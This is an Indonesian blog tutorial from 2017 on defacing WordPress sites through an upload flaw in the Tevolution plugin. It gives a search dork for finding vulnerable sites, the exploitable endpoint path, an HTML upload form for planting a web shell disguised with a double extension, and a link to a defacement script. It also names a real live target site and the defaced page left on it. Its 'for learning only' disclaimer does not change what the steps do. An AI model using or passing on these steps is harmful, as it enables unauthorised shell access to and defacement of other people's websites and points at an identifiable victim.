Deface Metode Tevolution Plugin Vulnerability - Alltutorcyber

Alltutorcyber

Kumpulan Berbagai TUTORIAL yang ada di Internet.

Breaking

Post Top Ad

All Tutor Cyber

Sunday, March 12, 2017

Deface Metode Tevolution Plugin Vulnerability


Deface Metode Tevolution Plugin Vulnerability

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface Metode Tevolution Plugin Vulnerability

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini


Disini saya akan menulis artikel yang berjudul "Deface Metode Tevolution Plugin Vulnerability" Langsung saja ke tutorialnya..

Bahan Bahan :

1. Dork: inurl:"/plugins/Tevolution/" (kembangi lagii)

2. Exploit: /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

3. CSRF (save dengan format .html ):
<form action = "http://site.target/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php"
method = "post" enctype = "multipart / form-data"> <label for = "file"> Filename: </ label> <input type = "file" name = "Filedata"> reviews <input type = "submit" name = "submit" value = "3xploi7ed!"> </ form >

4. Shell: format .php.xxxjpg => Download (Punya IndoXploit)
    contoh: Shell.php.xxxjpg 

5. Script deface : Download

Step by Step :

1. Dorking Dulu

2. Pilih salah satu Web
    Live Target: http://www.hebergement.rayssaguel.com/

3. Masukkan Exploitnya 
    contoh : http://www.hebergement.rayssaguel.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php

Vuln ?! "Blank" (Putih semua)

4. Buat CSRF nya tadi => Masukkan Target => Save dengan format .html

5. Buka CSRF => Upload Shell / Script deface

Kalau Gagal ada Tulisan [Error]

Akses Shell?!
www.site.com/wp-content/uploads/[tahun]/[bulan]/nameshell

Akses Script Deface?!

www.site.com/wp-content/uploads/[tahun]/[bulan]/namascript.html

Live Target Tadii http://www.hebergement.rayssaguel.com/wp-content/uploads/2017/03/index.html

Sekianlah Postingan Dari All Tutor Cyber tentang "Deface Metode Tevolution Plugin Vulnerability" Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "Deface Metode Tevolution Plugin Vulnerability" Dengan URL https://ryangueltoem.blogspot.co.id/2017/03/deface-metode-tevolution-plugin.html
Jika Ada Content Yang Berbau Pentest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

No comments:

Post a Comment